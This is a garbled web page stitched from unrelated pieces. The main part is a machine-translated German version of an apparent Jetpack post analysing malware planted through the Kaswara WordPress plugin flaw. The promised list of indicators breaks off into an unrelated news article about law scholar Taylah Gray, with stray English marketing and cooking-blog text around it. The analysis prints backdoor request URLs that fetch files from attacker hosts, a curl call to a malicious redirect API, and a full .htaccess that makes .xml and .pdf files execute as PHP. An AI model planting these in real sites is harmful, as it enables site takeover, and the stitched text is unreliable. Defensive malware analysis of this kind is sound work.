Jetpack Social, the newest and easiest way to share your WordPress content to Facebook, –Twitter, LinkedIn, and Tumblr — Jetpack
You’re already sharing posts, pages, and products on your website. Jetpack Social goes one step further and shares your content directly from the WordPress Editor to your social media channels. Write once, post everywhere.
In Ihrem sorgfältigen Budget, in dem Sie über Ihre Entwicklung nachdenken, hängt der ganze Erfolg vom gesunden Menschenverstand der Gemeinschaft ab, der Plan scheitert nicht, Hindernisse folgen frei und müssen in einer freien Gesellschaft leider erst gelöst werden, um dazu in der Lage sein. weiter erfolge zuerteilen,(se/nz)
Veröffentlicht am 8. Juni 2021 von Fioravante Souza
Verwundbares Kaswara Modern WPBakery Page Builder Addons Plugin wird in freier Wildbahn ausgenutzt, um Webseiten Anzugreifen.
Zurück am 20. April 2021, unsere Freunde bei WPScan re p orted eine schwere Sicherheitslücke auf Kaswara Moderne VC Addons, die auch als Kaswara Moderne WPBakery Page Builder Addons bekannt. Es ist bei Codecanyon/Envato nicht mehr verfügbar , was bedeutet, dass Sie, wenn Sie es ausführen , eine Alternative auswählen müssen.
Diese Schwachstelle ermöglicht es nicht authentifizierten Benutzern, beliebige Dateien in das Symbolverzeichnis des Plugins (./wp-content/uploads/kaswara/icons) hochzuladen. Dies ist der erste Indicator Of Compromise (IOC), den unsere Freunde von WPScan in ihrem Bericht mit uns geteilt haben.
Die Möglichkeit, beliebige Dateien auf eine Website hochzuladen, gibt dem Angreifer die volle Kontrolle über die Website, was es schwierig macht, die endgültige Nutzlast dieser Infektion zu definieren. Daher zeigen wir Ihnen alles, was wir bisher gefunden haben (wir haben uns von der Recherche etwas mitreißen lassen, also springen Sie gerne zum IOC-Abschnitt, wenn Sie nicht durchlesen möchten).
Datenbankinjektion, gefälschte Android-Apps und andere Hintertüren
Vielen Dank an unseren Freund Denis Sinegubko von Sucuri für den Hinweis auf das Follow-up der Datenbankinjektion, das bei diesem Angriff verwendet wurde.
Böse Akteure würden die Option ‘kaswara-customJS’ aktualisieren, um einen willkürlichen bösartigen Ausschnitt von Javascript-Code hinzuzufügen. Hier ist ein Beispiel, das wir gefunden haben:
Und wie es bei dieser Art von Skript normalerweise der Fall ist, lädt es eine Reihe anderer Javascript-Codeschnipsel, und die letzte Nutzlast ist entweder ein Malvertising oder ein Exploit-Kit. Dies ist sehr ähnlich zu dem, was Wordfence hier berichtet hat .
In diesem Fall stirbt das Skript auf hxxp://double-clickd[.]com/ und lädt keine schlechten Inhalte. Ich habe seit Anfang 2020 verdächtiges Javascript gefunden, das diese Seite aufruft, und die Leute haben sie bereits seit 2018 blockiert .
Gefälschte Apps, die auf die Website hochgeladen wurden
Die 40 Android-Apps, die wir auf den von uns untersuchten Websites gefunden haben, waren gefälschte Versionen verschiedener Apps wie AliPay, PayPal, Correos, DHL und viele andere, die laut dieser VirusTotal-Analyse glücklicherweise von den beliebtesten Anti-Virus-Anbietern erkannt wurden .
VirusTotal-Ergebnisse zu einer der APK-Dateien, die auf einer kompromittierten Website gefunden wurden
Ich habe die Absichten der App nicht überprüft, aber ein kurzer Überblick über die von ihr angeforderten Berechtigungen kann uns einen Eindruck davon geben, was sie tun könnte:
Diese Dateien werden jedoch nicht sofort mit dem Kaswara-Exploit hochgeladen. Nachdem die Site kompromittiert wurde, laden die Angreifer zuerst andere Tools hoch, um die Site vollständig zu kontrollieren.
Hochgeladene Dateien
Einige Backdoors und andere Malware wurden auch auf Websites gefunden, die von dieser Sicherheitsanfälligkeit kompromittiert wurden. Ich werde eine kurze Analyse der beliebtesten und interessantesten in diesem Beitrag teilen. Ich möchte mich jedoch zunächst auf die komplexeste konzentrieren.
Weiterleitung und gefälschte Apps
Die gefälschten Apps, die ich auf mehreren kompromittierten Websites gefunden habe, wurden nicht durch Ausnutzung der Kaswara-Sicherheitslücke hochgeladen. Sie werden mit einem multifunktionalen Hacktool auf die Site hochgeladen, das es dem Angreifer ermöglicht, Remote-Code hochzuladen (durch Angabe einer URL oder einer Zeichenfolge) und den Benutzer auf eine bösartige Site umzuleiten.
Die Datei kann leicht durch das Vorhandensein dieser Zeichenfolge identifiziert werden: base64_decode('MTIz');error_reporting(0);Funktion
Interessanterweise wird alles andere als dies randomisiert.
Die Malware befindet sich in einer einzigen Zeile, was auch ein interessantes IOC ist, wenn Sie nach dieser Art von Codeanomalie suchen.
c.php-Malware mit vollständiger Verschlüsselung
Zur besseren Verständlichkeit habe ich die meisten Teile des Codes entschlüsselt, die interessanten Funktionen umbenannt und den Code verschönert. Die Malware umfasst 6 verschiedene Funktionen, von denen 5 auf den an die Variable übergebenen Werten basieren . Betrachten wir für dieses Dokument eine der vielen Instanzen, die ich gefunden habe: .$_GET['ts']c.php
/c.php?ts=kt
Dies bewirkt nichts und zwingt die Site, einen 500-Fehler zurückzugeben (später im Code).
/c.php?ts=1
Ändert den $q1aFlagwert in true, um eine Codevalidierung durchzuführen und eine OK-Nachricht an den Angreifer auszugeben.
In diesem Fall antwortet die Gegenstelle: {"body":"","headers":["Location: http:\/\/good-valid-1"],"status":302,"contentType":""}
Schreibt eine Datei auf den Server mit Code, der vom Inhalt bereitgestellt wird, $_GET["v"]solange $_GET["p"]die SHA1-Prüfsumme 123 ist (erinnern Sie sich, dass der erste IOC von base64_decode('MTIz')? dies ist diese Prüfsumme).
/c.php?ts=tt
Schreibt 5 MB „-“ auf den Server, wahrscheinlich verwendet, um zu testen, ob die Upload-Funktion auf dem Server funktioniert.
/c.php?ts=dwm&h=HASH1,HASH2
Wenn die Malware diese Anfrage erhält, führt sie einen Test durch, um zu überprüfen, ob hochgeladene Dateien erfolgreich auf den Server geschrieben wurden. Ihre MD5-Hashes müssen bekannt sein und werden $_GET['h']als kommagetrennte Werte an die Variable gesendet .
/c.php?ts=dw&h=hash&l=URLs_as_CSV
Lädt eine Datei von einer Reihe von Websites von Drittanbietern herunter und speichert sie auf dem Server, wobei sie nach den letzten 12 Zeichen des md5 der heruntergeladenen Datei benannt wird.
Dies ist die Funktion, die verwendet wird, um gefälschte Apps auf den Server hochzuladen.
Hier ist ein Beispiel für die Aufforderung zum Herunterladen schädlicher Dateien /c.php?ts=dw&h=7e7bcc10406f3787b0a08d4199e6a697&l=http%3A%2F%2Fsmurfetta.ru%2Fhash-de%2F%3Fh%3D7e7bcc10406f3787b0a08d4199e6a697
Umleitung des Zugriffs
Wenn die kt Option oder keine Option ausgewählt wurde, fährt der Code mit der Umleitung fort, die durch Anfordern eines JSON-Blobs mit den erforderlichen Daten erreicht wird. Anschließend leitet es den Besucher mithilfe der Header-Funktion um.
Die Antwort ist wie folgt: {"body":"","headers":["Location: https:\/\/stunningawards.life\/?u=yuek60p&o=2k5p1e0&m=1"],"status":302,"contentType":""}
Die Funktion zum Ausführen einer cURL-Anfrage mit den benötigten Parametern ist diese: Nichts Besonderes…
Und es kann in diese cURL-Anfrage übersetzt werden:
12345
curl -X POST hxxp://papass[.]ru/click_api/v3\-H 'X-Forwarded-For: 200.171.221.1'\-H 'Accept-Language: *'\-H 'User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.0 Chrome/87.0.4280.141 Mobile Safari/537.36'\-d 'token=hmfovdqs9vfxp8s4rwqzxbfz6c43bwgb&force_redirect_offer=1&sub_id_1=dbhomeworkout.com&sub_id_2=dbhomeworkout.com&sub_id_3=dbhomeworkout.com&sub_id_4'
Die endgültige URL ist, soweit ich das testen konnte, zufällig, hat aber die gleiche Eigenschaft, eine gefälschte Seite für einen beliebten Dienst oder eine App zu sein.
wp‑content/uploads/kaswara/icons/16/javas.xml und wp‑content/uploads/kaswara/icons/16/.htaccess
Eine XML-Datei wird normalerweise nicht als potenzielle Bedrohung markiert, aber in diesem Fall haben wir eine speziell gestaltete .htaccess-Datei, die die Sicht des Webservers ändert:
1234567891011121314fünfzehn
Order Deny,AllowAllow from all<FilesMatch "_?(javas|homes|menus)\.(php|xml|pdf)\d*$">AddHandler application/x-httpd-php .xml .pdfAddType application/x-httpd-php .xml .pdf# ---SetHandler application/x-httpd-phpForceType application/x-httpd-php# ---php_value engine 1# ---Order Deny,AllowAllow from all</FilesMatch>
Tatsächlich weist Apache an, alle Java-, Home- oder Menüdateien mit xml, php oder pdf als PHP-Datei zu verstehen, die entsprechend verarbeitet und ausgeführt werden soll. Jede dieser Dateien, die sich in derselben Verzeichnisstruktur wie diese .htaccess befinden, ist also verdächtig.
Die Datei javas.xml ist mit einigen anderen schädlichen Dateien identisch, die auf die Site hochgeladen wurden. Ich habe festgestellt, dass der Unterschied darin besteht, dass einige am Ende der Datei eine oder zwei Leerzeilen haben, was das traditionelle Hashing etwas schwieriger macht.
Der Schadcode wird mit str_rot13- und base64-codierten Strings verschleiert. Es verwendet auch hexadezimale Werte und mathematische Operationen, um die Zeichenfolgen ein wenig mehr auszublenden. Die endgültige Nutzlast ist unbekannt, da sie eine Funktion basierend auf den Werten einer POST-Anforderung erstellt. Die Nutzlast scheint jedoch jedes Mal gleich zu sein, da sie vor der Erstellung auf eine md5-Prüfung angewiesen ist (c42ea979ed982c02632430e9e98a66d6 ist der md5-Hash).
Fazit
Da es sich um eine aktive Kampagne handelt, stellen wir zum Zeitpunkt des Schreibens dieses Beitrags immer mehr verschiedene Malware-Beispiele fest, die auf den betroffenen Websites abgelegt werden. Einige sind nur Variationen dessen, was wir hier haben, während andere für eine tiefere Analyse interessant genug sind. Suchen Sie in Kürze nach einigen kleineren Beiträgen, um einige dieser anderen Beispiele zu erkunden.
Dies zeigt, wie wichtig es ist, Ihre Erweiterungen mit den neuesten Sicherheitsfixes zu aktualisieren. Wenn die Entwickler Fixes nicht rechtzeitig veröffentlichen oder es aus dem WordPress.org-Repository (oder anderen Marktplätzen) entfernt wird, empfehlen wir Ihnen dringend, eine sicherere Alternative dazu zu finden.
Wenn Sie sich Sorgen über Malware und Sicherheitslücken für Ihre Website machen, sehen Sie sich die Sicherheitsfunktionen von Jetpack an. Jetpack Security bietet benutzerfreundliche , umfassende WordPress-Site-Sicherheit, einschließlich Backups, Malware-Scans und Spam-Schutz.
Indikatoren für Kompromisse
Hier finden Sie die vollständige Liste aller von uns identifizierten IOCs:
Oberster Richter Tom Bathurst, Taylah Gray und Professor Tania Sourdin (Universität Newcastle)Eine Wiradjuri-Frau hat eine wechselvolle akademische Vergangenheit hinter sich, nachdem sie zum Doktor der Rechtswissenschaften zugelassen wurde.Durch Douglas SmithQuelle: NITV Nachrichten2. MÄRZ 2021 – 16:33 AKTUALISIERT 2. MÄRZ 2021 – 16:33 UHR
“Lass niemanden oder irgendein System deine Träume zerstören”: Taylah Gray
Australien,-Nachdem die 24-jährige Wiradjuri-Frau und Anwältin Taylah Gray in ihren Schuljahren jede juristische Bewertung und Prüfung nicht bestanden hat, trotzt sie den Widrigkeiten ihrer Vergangenheit und steht kurz vor einer Promotion in Rechtswissenschaften.
Ihre Promotion wird sich auf Native Title und Souveränität konzentrieren.
Letzte Woche sprach Frau Gray in einem Facebook-Post, der viral wurde, über strukturelle Ungleichheiten gegenüber Menschen der First Nations in australischen Bildungssystemen und ermutigte junge Menschen, sich an ihrem Beispiel zu orientieren.
“Wenn es Kinder der First Nations gibt, die dies lesen, möchte ich, dass Sie wissen, dass das Bildungssystem nicht für uns gebaut ist”, las sie ihren Beitrag.
“Aber lassen Sie sich vom System nicht glauben machen, dass Sie nicht begabt oder talentiert genug sind.
“Ich habe jedes Jurastudium während des gesamten 11. und 12. Jahres nicht bestanden. Glauben Sie mir, JEDE BEWERTUNG UND PRÜFUNG habe ich nicht bestanden.
Am Montag sagte Frau Gray gegenüber NITV News, dass sie andere dazu inspirieren wolle, Benachteiligungen zu überwinden, und berichtete von den Kämpfen, mit denen sie selbst in Dubbo im Zentrum von New South Wales aufgewachsen war.
“Zu Hause war es ein bisschen schwierig … als ich bei meinem Vater lebte, hatten wir kein WLAN, also war es ein Kampf, und es war schwierig, meinen HSC zu machen”, sagte sie.
„Es gab viele Kinder, die sich für ihre pädagogische Unterstützung auf ihre Eltern stützen konnten, aber das konnte ich nicht, weil meine Eltern nicht zur Universität gingen.
“Mein Vater ist ein Überlebender der gestohlenen Generation – er wurde davon abgehalten, sich mit dem Bildungssystem zu beschäftigen, und er musste für jede Lektion hinten in der Klasse sitzen.”
Aus Respekt vor Ureinwohnern: Australien ändert Nationalhymnen
Nachdem Frau Gray die für die Zulassung zur Universität erforderlichen Noten nicht erreicht hatte, absolvierte sie stattdessen einen indigenen Grundkurs an der Universität von Newcastle, der ihr den Eintritt in die juristische Fakultät erleichterte.
Als Frau Gray über die Erfahrungen ihres Vaters als Kind nachdachte, machte sie es sich zur Regel, dass sie an der Spitze jeder Rechtsklasse sitzen würde, an der sie teilnahm.
“Ich habe die Klasse an der juristischen Fakultät angeführt und wurde neulich akzeptiert, um eine Doktorarbeit zu schreiben. Es geht um Native Title – es geht um Wirtschaftstheorien”, sagte sie.
Ihre Bemühungen, sich für die Rechte der Ureinwohner einzusetzen, haben in ganz Australien bereits Schlagzeilen gemacht.
Im Juli letzten Jahres gewann sie einen Fall des Obersten Gerichtshofs, in dem eine Entscheidung der NSW-Polizei aufgehoben wurde, einen Protest gegen Black Lives Matter im CBD von Newcastle zu verbieten.
Taylah Grays Bemühungen haben bereits Schlagzeilen gemacht und die Entscheidung der NSW-Polizei, einen Protest gegen Black Lives Matter im Newcastle CBD im Jahr 2020 zu verbieten, aufgehoben.Quelle: Facebook (Taylah Gray).
Frau Gray sagte, dass ihr Fokus jetzt auf Native Title liegt und dass ihre Doktorarbeit Wirtschaftstheorien untersuchen wird, die Indigenen helfen, Einkommen aus positiven Bestimmungen zu generieren.
“Es wird … untersuchen, wie schwarze und weiße Menschen das Land gemeinsam nutzen können und wie schwarze Menschen dabei auch wirtschaftlich unabhängig und nachhaltig werden können”, sagte sie.
Indigene Demonstranten nehmen an einer BLM-Kundgebung (Black Lives Matter) im The Domain in Sydney am Sonntag, dem 5. Juli 2020, teil. (AAP)
“[Wir können] rechtliche Anerkennung von Land haben … wir können das Land nutzen, um Einkommen für Blackfullas zu generieren, und nicht nur für Blackfullas, sondern auch dafür, wie weiße Menschen etwas zurückgeben können.”
Frau Gray sagt, dass sie sich nach Abschluss ihrer Promotion mit dem Strafrecht befassen und möglicherweise Verteidigerin werden möchte. Aber vorerst wird sie ihre Optionen offen halten.
„Ich bin aufgeschlossen, ich bin offen, aber ich weiß, in welchem Bereich. Es ist entweder Strafrecht oder Landrecht, dort möchte ich enden. “
I have created this site to help people have fun in the kitchen. I write about enjoying life both in and out of my kitchen. Life is short! Make the most of it and enjoy!
You must be logged in to post a comment.